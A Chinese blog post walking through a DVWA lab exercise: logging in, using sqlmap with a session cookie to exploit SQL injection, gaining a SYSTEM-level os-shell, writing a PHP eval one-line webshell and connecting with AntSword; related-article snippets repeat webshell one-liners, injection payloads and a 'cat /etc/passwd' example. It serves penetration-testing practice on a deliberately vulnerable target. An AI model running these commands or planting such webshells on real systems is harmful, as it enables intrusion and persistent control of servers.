【渗透练习系列】DVWA的一次登录后通过Sqlmap拿到os-shell,命令执行写入一句话-01

原创 已于 2022-01-19 22:24:01 修改 · 4.7k 阅读 · 14 ·
CC 4.0 BY-SA版权
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
文章标签:

#安全 #web安全 #php #渗透测试

于 2022-01-19 22:19:16 首次发布

一、前言

本次将通过DVWA靶机来展示怎样通过Sqlmap获取目标os-shell,得到命令执行权限,从而写入一句话木马,持续控制目标服务器。

二、测试

1.打开目标站点:http://192.200.30.126/DVWA/login.php,从网页后缀和wappalyzer浏览器插件来看,站点的编程语言为PHP。
在这里插入图片描述2.输入账号跟密码登录后台,同时开启Burp抓取http包。
获取登录后的Cookie值:
在这里插入图片描述3.找到存在SQL注入的模块。获取URL。

http://192.200.30.126/DVWA/vulnerabilities/sqli/?id=1&Submit=Submit#

在这里插入图片描述4.由于该页面是登录后,不能直接用SQLMAP跑,需要加入Cookie来注入。构造如下命令:

sqlmap.py -u "http://192.200.30.126/DVWA/vulnerabilities/sqli/?id=1&Submit=Submit#" --cookie "security=low; PHPSESSID=43teu289ku4vi8g9updhua57o3" --batch

在这里插入图片描述这里可以看到是存在数字型注入的,可通过’–+进行闭合。

5.直接通过手工注入,爆出数据库路径为D:\phpstudy_pro\Extensions\MySQL5.7.26
看到站点通过phpstudy搭建,猜测web路径为:D:\phpstudy_pro\WWW
【注意】:通过sqlmap获取os-shell,需要知道站点的绝对路径。
在这里插入图片描述6.直接通过SQLMAP加载os-shell。执行如下命令:

sqlmap.py -u "http://192.200.30.126/DVWA/vulnerabilities/sqli/?id=1&Submit=Submit#" --cookie "security=low; PHPSESSID=43teu289ku4vi8g9updhua57o3" --os-shell

在这里插入图片描述1).第一个选择,首先选择web支持的脚本语言。(之前已经知道网站是PHP语言,)
2).第二个选择,您希望sqlmap进一步尝试揭示完整路径吗? Y
3).第三个选择,302重定向到目标URL。 你想跟上吗? Y
4).第四个选择,你提供了一个HTTP Cookie头值,而目标URL在与你的Cookie头相交的HTTP Set-Cookie头中提供了自己的Cookie。 是否要在进一步的请求中合并它们? n
5).第五个选择,你想用什么作为可写目录?
[1] 常用路径枚举
[2]自定义路径
[3] 自定义枚举字典
[4] 蛮力枚举路径

这里选择2,使用之前猜测的web路径:D:\phpstudy_pro\WWW\,不过这里需要使用反斜杠:D:/phpstudy_pro/WWW/

7.获取到os-shell后,直接命令执行whoami,发现直接是system权限。
在这里插入图片描述
8.通过dir获取当前路径,D:\phpstudy_pro\WWW\路径下确实是DVWA网站的web路径。
在这里插入图片描述
9.直接通过echo写入一句话PHP木马,写入到web的根路径下。这里敲完命令就直接按回车。

echo "<?php @eval($_POST["shell"]);?>" > shell.php

在这里插入图片描述
10.直接通过蚁剑连接,测试连接成功。成功获取目标站点管理权限。
在这里插入图片描述在这里插入图片描述

SQL注入获取系统权限的方式总结
渗透之路,攻防之间皆学问
04-29 3万+
本文详细介绍了通过MySQL获取系统权限的多种方法,包括前置条件、权限查看、secure_file_priv配置说明,以及在实际环境中利用MySQL写webshell和UDF提权的具体操作步骤。主要内容涵盖:1. 基本环境要求(写权限、路径、root权限);2. 关键参数secure_file_priv的作用与配置修改;3. 获得MySQL账号后写入webshell的多种方式(INTO OUTFILE、日志文件、慢查询);4. Windows/Linux下的UDF提权技术;5. SQL注入获取高权限时的利用
sqlmap结合dnslog外带注入
newlife1441的博客
08-05 814
目录📓前言📓操作步骤1.win11中下载小皮搭建sqli-labs靶场并查看win11数据库中的文件读取配置2.环境准备2.1Windows server2008 2.1.1搭建dns服务器2.2测试2.2.1设置靶机的网络的dns为server20082.2.2在win11靶机ping一下server2008中创建的域名并打开kali查看 2.2.3server2008中创建转发器2.2.4测试转发器的域名是否可以ping通并查看kali中接收情况2.3开始sqlmap使用dnslog外带注入2.3...
SQL注入SQLmap简单用法,和SQL注入写入一句话木马
m0_56214376的博客
03-16 9642
SQL注入 Boolean注入攻击-布尔盲注 1' and length(database())>1 -- qwe 1’ and length(database())>10 # mysql数据库中的字符串函数 substr()函数和hibernate的substr()参数都一样,但含义有所不同。 用法: substr(string string,num start,num length); string为字符串; start为起始位置; length为长度。 1’ and ascii(s
sqlmap写入一句话木马
热门推荐
初学者L_言的博客
11-26 1万+
工具 靶机——metasploitable2 攻击机——kali 环境——Mutillidae 菜刀——蚁剑 主要参数 sqlmap参数: --file-read=RFILE Read a file from the back-end DBMS file system 从后端的数据库管理系统文件系统读取文件 --file-write=WFILE Write a ...
DVWA(linux下)利用sqlmap进行--os-shell注入不能成功的错误处理
Spwpun的博客
11-16 1万+
报错情况: 我在自己的kali linux虚拟机下面安装了DVWA渗透测试系统以便自己进行渗透测试的基础学习,在进行sqli(sql injection)-low级别的测试的时候,利用sqlmap进行注入,加上–os-shell参数获取shell(即系统下的命令行,windows下的cmd,linux下的terminal),发现不能执行。 最后总是报这样的错,unable to uploa...
--os-shell在MySQL可运行环境
m0_56214376的博客
05-24 794
发现一个网站有SQL注入,用SQLmap --OS-shell 连接不上,查了点资料,记录一下。 先说说--os-shell,--os-shell就是在你注入点写入两个shell文件,一个用来执行命令,另外一个是网站访问可以上传文件。 我查了一下,在<=MySQL5.7的版本需要开启一下secure_file_priv 这个参数用来限制数据导入和导出操作的效果, 如果这个参数设为一个目录名,MySQL服务只允许在这个目录中执行文件的导入和导出操作。这个目录必须存在,MySQL服务不会创...
SQL注入(宽字节注入,sql注入到getshellsqlmap注入的使用)和XSS漏洞(存储型)实战练习DVWA靶场)
m0_74292210的博客
03-21 781
因为网站会把用户输入的'前面加\进行处理,\会被编码为%5c,但是在查询中把%df和%5c通过GBK编码为汉字。在我们的请求里面,网站已经把我们输入的%编码为了%25,不能达到我们的目的,所以手动修改数据包。发现name做了长度限制,可以通过抓包或者改前端html来绕过。然后发现name做了<script>的替换,然后可以开始绕过。发现方法有效,该点存在宽字节注入漏洞,然后开始正式爆破。所以在'前加一个%df就可以把网站给我们加的\给绕过。过滤,绕不过去,只能从name注入。数据库名为pikachu。
渗透测试靶场DVWA练习
hp.puppy的博客
03-29 880
渗透测试靶场DVWA练习
【每天学会一个渗透测试工具】SQLmap安装教程及使用
菜鸟小羊的博客
07-04 1万+
Sqlmap是一款开源的渗透测试工具。
sqlmap --os-shell写入木马获取getshell
qq_59607911的博客
10-17 1004
python sqlmap.py -r C:\Users\南倾\Desktop\222.txt --os-shell。将POST包放入TXT文本中 并启动sqlmap读取txt文件。对存在SQL注入处抓包,查看报错暴露出绝对路径。
sqlmap上传shell--dvwa演示】--sql注入常用语句
m0_63241485的博客
08-31 2021
sql上传shell,sql常用语句,sqlmap常用语句
CMD写一句话木马
m0_49972294的博客
12-22 3474
linux: echo -e "<?@include(\$_POST["c"]);?>" > webshell.cc.php 会再同目录下生成webshell.cc.php一句话 密码:c win: echo ^<%eval request("c")%^> >>webshell.cc.asp 会再同目录下生成webshell.cc.asp一句话 密码:c ...
命令执行1
2302_79885863的博客
04-20 1221
RCE:远程命令执行或者代码执行,因为RCE这个词的滥用,RCE的范围比较广,只要渗透的最终情况可以实现都属于RCE,列如:代码执行、文件包含、反序列化、命令执行、甚至是写文件Getshell都可以属于RCE。RCE漏洞,可以让攻击者直接向后台服务器远程注入操作系统命令或者代码从而控制后台系统。
DVWA-命令注入漏洞获取目标shell并提到最高权限[msfvenom]
King_Ho的博客
12-21 3549
MSF攻击Windows实验: 方法一 :通过web站点,使用无文件的方式攻击利用执行 方法二:通过web站点,上传webshell, 返回给msf 方法三:攻击其他端口服务,拿到meterpreter 信息收集-Nmap端口扫描 信息收集总在前 root@kali:~# nmap -sV -T4 xxx.xxx.xxx.xxx Starting Nmap 7.80 ( https://nmap.org ) at 2020-09-29 10:46 CST Not shown: 992 filtered p
代码审计——DVWA Command Injection(命令执行)
z1756227332的博客
03-05 436
关于命令连接符 command1 && command2 表示 command1执行成功后command2后执行,如果command1执行失败command2就不执行 command1 & command2 &表示command1 不管是否成功,都会执行command2 command1 || command2 ||表示先执行command1,执行失败后,执行com...
sql 上传文件 下载文件 一句话木马+菜刀 sqlmap
qq_41071646的博客
02-21 4131
这里说的内容可能比较多  但是都需要  高的权限 能够 创建删除 文件~~~~   然后 先说一下 下载文件吧     我们构造的链接是 http://127.0.0.1/sqli-labs-master/sqli-labs-master/Less-1/?id=0' union select 1,load_file("D:\\flag.txt"),3 --+ 然后  我们的内容 如下  ...
Linux文件添加内容[笔记]
CX0330的博客
04-11 3134
原文覆盖型写法 (文件里原来的内容被覆盖)echo "aaa" &gt; a.txtecho aaa &gt; a.txt添加型写法 (新内容添加在原来内容的后面)echo "aaa" &gt;&gt; a.txtecho aaa &gt;&gt; a.txt其中 echo &gt;or&gt;&gt; file,在 user space 中会赋值到 buf 中为 string+换行符,传入到 k
DVWA通过SQL注入写入马儿及直接通过sqlmap获取shell避坑指南
qq_38053759的博客
12-29 3497
DVWA通过SQL注入写入马儿及直接通过sqlmap获取shell避坑指南 走过的坑,随手记下!!! 1. 通过sql注入写入木马文件 sql注入写入木马文件要求:1)secure-file-priv参数设置为空 2)写入的参数列名排序规则兼容 3) 知道服务器的绝对路径(路径要双写分隔符,避免被转义) 1....
使用sqlmap -r request.txt --os-shell请求方式获取dvwa的sqli模块low等级的交互式命令,并说明其背后原理(图文步骤)
最新发布
10-01
### 图文步骤说明 #### 1. 准备工作 - **环境搭建**:确保已经安装好 DVWA(Damn Vulnerable Web Application),并且处于 low 安全等级,同时安装好 sqlmap 工具。 - **获取请求文件**:使用浏览器开发者工具(如 Chrome 的开发者工具),在 DVWA 的 sqli 模块中发起一个正常请求,然后将请求信息保存为 `request.txt` 文件。具体操作是在开发者工具的 Network 面板中,找到对应的请求,右键选择“Copy as cURL”,然后将内容粘贴到文本编辑器中保存为 `request.txt`。 #### 2. 执行命令 打开终端,切换到 `request.txt` 文件所在的目录,执行以下命令: ```bash sqlmap -r request.txt --os-shell ``` 此命令会让 sqlmap 读取 `request.txt` 中的请求信息,并尝试在该请求的基础上进行操作系统命令注入,以获取交互式命令 shell。 #### 3. 等待探测与注入 - sqlmap 会首先探测目标站点是否存在 SQL 注入漏洞。如果存在,它会进一步尝试获取数据库的相关信息,如数据库类型、表名、字段名等。 - 在探测过程中,会显示一系列的信息和进度,等待其完成。 #### 4. 获取交互式命令 -sqlmap 成功完成注入后,会提示你已经获取到操作系统的交互式命令 shell。此时,你可以在终端中输入各种操作系统命令,如 `ls` 查看目录列表,`cat /etc/passwd` 查看用户信息等。 ### 背后原理 在 DVWA 的 sqli 模块 low 等级下,代码对用户输入的 SQL 查询参数没有进行严格的过滤和验证,这就为 SQL 注入攻击提供了可乘之机。 #### SQL 注入原理 用户输入的参数直接拼接到 SQL 查询语句中,攻击者可以通过构造特殊的 SQL 语句来改变原查询的逻辑。例如,正常的查询语句可能是: ```sql SELECT * FROM users WHERE id = '1'; ``` 攻击者可以构造输入 `1' OR '1'='1`,使得查询语句变为: ```sql SELECT * FROM users WHERE id = '1' OR '1'='1'; ``` 这样,该查询会返回所有的用户记录,因为 `'1'='1'` 始终为真。 #### 操作系统命令注入原理 当攻击者发现 SQL 注入漏洞后,如果目标数据库所在的服务器允许执行系统命令(如 MySQL 的 `LOAD_FILE`、`system` 等函数),就可以通过 SQL 注入来执行操作系统命令。 `sqlmap -r request.txt --os-shell` 命令会自动完成以下步骤: - 检测 SQL 注入点:通过发送各种测试 payload 来判断目标是否存在 SQL 注入漏洞。 - 获取数据库信息:确定数据库类型、版本等信息,以便选择合适的注入方法。 - 构造注入语句:根据检测到的信息,构造能够执行操作系统命令的 SQL 注入语句。 - 执行命令:将构造好的注入语句发送到目标服务器,执行操作系统命令,并将结果返回。 通过以上步骤,攻击者就可以在目标服务器上获取交互式的操作系统命令 shell,实现对服务器的控制。
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值